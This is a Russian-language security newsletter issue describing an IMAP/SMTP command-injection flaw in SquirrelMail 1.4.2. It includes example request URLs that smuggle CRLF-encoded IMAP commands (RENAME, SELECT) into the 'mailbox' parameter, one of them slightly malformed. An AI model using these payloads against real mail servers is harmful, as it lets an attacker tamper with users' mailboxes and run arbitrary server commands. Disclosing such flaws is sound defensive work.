Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в SquirrelMail.


Компьютер для продвинутых пользователей
Содержание:
SquirrelMail
ПО: SquirrelMail
Версия: -

О софте:
SquirrelMail стандартно укомплектованный webmail пакет написанный на PHP4. Содержит внутри поддержку IMAP и SMTP протоколов и все страницы написаны на HTML 4.0 для максимальной совместимости со всеми браузерами. Продукт имеет очень малые требования и очень легок в настройке и установке. SquirrelMail содержит все что вы ждете от почтового клиента, встроенная поддержка MIME, адресная книга и возможность управления папками.
http://www.squirrelmail.org
Уязвимость:
SquirrelMail работает с почтовым сервером через интерактивный графический интерфейс используя IMAP и SMTP протоколы. Правильность ввода команд и информации проходит проверку в течении использовании приложения. Так атакующий может вводить произвольные команды IMAP/SMTP серверов в письмо. Это очень опасно из-за возможности инъекции с помощью команд, позволяющих атакующему поднять свои привилегии и использовать уязвимости, которые существуют на сервере с помощью команд.
Использоваине:
== IMAP пример (версия 1.4.2) =============
SquirrelMail уязвимый параметр: "mailbox"
Когда пользователь кликает на поле "Тема" письма, то создается запрос:
http:///src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0
Атакующих может изменить параметр "mailbox" и вставить любую IMAP команду:
http:///src/read_body.php?mailbox=INBOX%22%0D%0%0D%0A%20SELECT%20%22INBOX&passed_id=&startMessage=1
Пример:
http:///src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&startMessage=1
SquirrelMail
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

В избранное